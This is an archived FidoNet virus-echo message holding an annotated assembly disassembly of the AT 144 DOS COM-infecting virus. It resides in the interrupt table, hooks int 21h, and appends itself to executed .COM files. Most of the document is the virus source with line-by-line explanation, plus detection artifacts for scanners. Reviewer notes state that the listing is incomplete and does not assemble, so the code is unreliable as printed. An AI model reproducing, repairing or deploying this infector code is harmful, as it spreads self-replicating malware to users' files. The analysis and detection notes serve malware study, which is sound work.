; Msg : 7 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : AT_144.ASM
;.RealName: Max Ivanov
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Информация о вирусах)
;* From : Doug Bryce, 2:283/718 (06 Nov 94 16:24)
;* To : Mike Salvino
;* Subj : AT_144.ASM
;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org
;This is a disassembly of the AT 144 virus. It is processor specific
;and will only run on AT-class machines (286+). It copies itself
;onto the interrupt table and hooks int 21h, function 4bh. Because it
;lives in the interrupt table, its infection routine calls the original
;Int 21h simply by invoking the INT whose vector slot holds the saved
;handler - in this case Int B4h. One interesting thing
;is the JMP SI instruction at the end to return to the host - this
;works because DOS initially sets SI to 100 for running COM files.
;This virus infects any .COM file executed.
;Please - Do NOT release this or any other virus.
;For educational purposes ONLY! I take no responsibility for damages caused
;by the misuse of this or any other disassembly - they are made to help
;educate programmers as to the workings of the individual viruses and
;viruses as a whole. Such information MUST remain free and uncensored.
;Disassembly by Black Wolf
;-----------------------------------------------------------------------
; AT 144 -- 144-byte (90h) COM infector; per the header it runs only on
; AT-class (286+) machines (pusha/popa are used).  MASM/TASM syntax,
; tiny model, org 100h.  Annotations below are for analysis; the image
; layout is derived from the constants in the code (mov cl,90h,
; mov dx,37h, add si,31h, sub si,3Ah) -- TODO confirm against the original.
;
; NOTE(review): this listing is incomplete and does not assemble as
; printed.  The page header counts 152 lines but 113 are shown, and the
; labels Get_Displacement, Done_Install, Exit_Handler, Close_File and
; start are referenced but never defined.  Several places are marked
; below where the listed code and the header's description disagree.
;
; Resident image (copied to 0024h:0000, linear 240h, i.e. on top of the
; IVT entries of int 90h..0B3h), inferred offsets:
;   00h..35h  installer, run once from the infected host
;   36h       Jump_Byte (E9h): first byte of the jmp written over a host
;   37h..39h  3 saved host bytes (first generation: mov ax,4c00h)
;   3Ah..8Fh  int 21h handler; the hook vector is 0024h:003Ah
;   90h       IVT slot of int 0B4h, read as the operand of the far jump
;             at 8Fh -- it must hold the original int 21h vector
;
; Artifacts a scanner or incident responder can look for:
;   - int 21h vector = 0024h:003Ah; byte at 0000:0240h = 60h (pusha)
;   - IVT entries 90h..0B3h overwritten with code
;   - a COM file that starts with E9h and whose 16-bit displacement
;     equals (file size - 3 - 90h); infected files grow by 90h bytes
;   - files whose first byte is 'M' (EXE) are not touched
;-----------------------------------------------------------------------
.model tiny
org 100h
;===== First-generation carrier =====
db 0e9h,02,0 ;jmp rel16 +2: skip the int 21h below, land on Virus_Entry
;(label not shown).  Also the 3 bytes every later host gets overwritten with.
int 21h ;Terminate.  Reached after the installer has rewritten 100h..102h
;with the saved bytes (first generation: mov ax,4c00h) and done jmp si.
;===== Installer (runs in the host's segment: DS=ES=CS=PSP, SI=100h) =====
;NOTE(review): the "installed?" test below compares the first byte of the
;resident image with 60h (pusha), but no pusha precedes mov di,si in this
;listing -- the image's first instruction is presumably missing.
mov di,si ;DI = 100h (DOS entry value of SI for a COM): restore destination
call Get_Displacement ;Label not defined here.  The pop si that follows
;suggests the call target is simply the next instruction, so the call only
;pushes the IP of that pop (classic get-own-address, as the virus sits at a
;different offset in every host).
pop si ;SI = address of this instruction
add si,31h ;SI -> the 3 saved host bytes (image offset 37h, cf. mov dx,37h)
movsw ;Restore host in memory: 2 of the saved bytes -> ES:DI = 100h.
;NOTE(review): only two of the three saved bytes are restored as listed;
;sub si,3Ah below only reaches image offset 0 if SI advanced by 3 here,
;so a third (byte) copy is presumably lost from the listing -- TODO confirm.
mov ax,24h ;Set ES:DI to interrupt table: ES = 0024h = linear 240h, the IVT
;slot of int 90h.  90h bytes from there cover the vectors of int 90h..0B3h.
mov es,ax
xor di,di ;DI = 0
sub si,3Ah ;DS:SI = start of the image inside the host
cmp byte ptr es:[di],60h ;Check if installed: first image byte == 60h (pusha)?
mov cl,90h ;CX = 90h = image length.  CH is never cleared in this listing;
;the code relies on it being 0 at COM entry.
rep movsb ;Copy virus into memory (also when already resident: same bytes).
;mov and rep movsb leave the flags alone, so jz still tests the cmp above.
jz Done_Install ;Already resident -> skip the hook.  Done_Install is not
;shown; from the flow it sits at the push cs / pop ds pair below.
mov ds,cx ;CX = 0 after rep movsb -> DS = 0000h, the interrupt vector table
mov si,84h ;Get Int 21 vector: 0000:0084h is the int 21h IVT entry.
;NOTE(review): as listed, the two stores below land on 0:0080h / 0:0082h,
;the int 20h slot, not int 21h, and nothing here copies the old int 21h
;vector into the int 0B4h slot (linear 2D0h = ES:DI right after the copy
;above) that the header and the far jump at the end depend on.  Code that
;advances SI by 4 while saving the vector is presumably missing -- confirm.
mov word ptr [si-4],3Ah ;Hook Int 21: offset = image offset 3Ah (handler entry)
mov [si-2],ax ;segment = 0024h (AX unchanged since mov ax,24h)
push cs ;DS = ES = CS = host PSP segment again (Done_Install path joins here)
pop ds
push cs
pop es
jmp si ;Jumps back to host....  Per the header this relies on SI = 100h,
;but SI was advanced by the copies and then set to 84h above; the listing
;must be missing whatever restores it (Done_Install presumably also restores
;the registers saved by the pusha implied by the 60h check) -- TODO confirm.
;DOS sets SI = 100h when
;a COM is loaded.
;===== Resident int 21h handler (image offset 3Ah, runs with CS = 0024h) =====
;Jump_Byte and the 3 storage bytes sit directly in front of the entry point
;so that lea dx,[si-1] / mov cx,3 below can write "E9 <disp>" from one place.
Jump_Byte db 0e9h ;opcode of the jmp rel16 written over a host's first byte (36h)
mov ax,4c00h ;3-byte storage slot (37h..39h).  First generation: holds this
;mov ax,4c00h so the restored carrier runs mov ax,4c00h / int 21h and exits;
;later generations: the host's original first 3 bytes.
pusha ;Save all Regs.  Handler entry (vector 0024h:003Ah).
push ds
xor ah,4Bh ;Check if execute: ZF=1 iff AH == 4Bh (EXEC); AH is clobbered but popa restores it
jnz Exit_Handler ;Not EXEC -> pass through.  Exit_Handler is not shown;
;from the flow it is the pop ds / popa / db 0EAh at the end.
mov ax,3D02h
int 0B4h ;Open the file for read/write; DS:DX is still the caller's path.
;Int 0B4h is the saved DOS int 21h (its IVT slot follows the image; see db 0EAh).
jc Exit_Handler ;open failed -> pass through
mov bx,ax ;BX = file handle
push cs
pop ds ;DS = CS = 0024h: the resident image is also the data area
mov ah,3Fh
mov cx,3
mov dx,37h ;DS:DX = storage slot
mov si,dx ;SI = 37h for the checks below
int 0B4h ;Read in 3 bytes for storage.
cmp byte ptr [si],4Dh
je Close_File ;Check if it's an EXE: first byte 'M' -> close and leave it
;alone.  Only the first byte is tested.  Close_File is not shown; from the
;flow it is the mov ah,3Eh below.
mov ax,4202h
xor cx,cx
xor dx,dx
int 0B4h ;Go to end of file: AX = low word of the file size (DX is ignored)
sub al,3 ;save jump size: displacement of a jmp at offset 0 = size - 3.
;Only AL is adjusted; a borrow out of AL is not carried into AH.
mov bp,ax ;BP = displacement to be written
mov cl,90h ;CX = 90h (CH = 0 from xor cx,cx above)
sub ax,cx ;AX = size - 3 - 90h = the displacement an already-infected host carries
cmp ax,[si+1] ;...compared with bytes 2-3 of the file (the current jmp operand).
;A file whose jmp lands exactly 90h bytes before EOF is treated as infected.
je Close_File ;(Quit if infected)
mov ah,40h ;Append Virus: write CX = 90h bytes from DS:DX = 0024h:0000 (DX is
;still 0), i.e. the whole resident image.  The storage slot now holds the
;host's original 3 bytes, so they travel with the copy for the next restore.
int 0B4h
mov ax,4200h
xor cx,cx
int 0B4h ;Go back to the beginning (CX:DX = 0:0)
mov ah,40h
lea dx,[si-1] ;DS:DX = Jump_Byte (36h): E9h followed by...
mov cl,3
mov [si],bp ;...the displacement, patched into the first two storage bytes
int 0B4h ;Write in the jump (3 bytes over the host's entry).
mov ah,3Eh
int 0B4h ;Close file.
pop ds
popa ;Exit Handler: all registers restored, then chain to DOS
db 0EAh ;Far Jump to old Int 21h.  Only the opcode is here: by byte count
;the handler ends at image offset 8Fh, so the 4-byte operand is the IVT slot
;of int 0B4h (offset 90h), which must hold the saved int 21h vector.
end start ;NOTE(review): start is never defined in this listing.
;-+- Concord/QWK O.O1 Beta-7
; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
;Yoo-hooo-oo, -!
; þ The MeÂeO
;/x Include false conditionals in listing
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)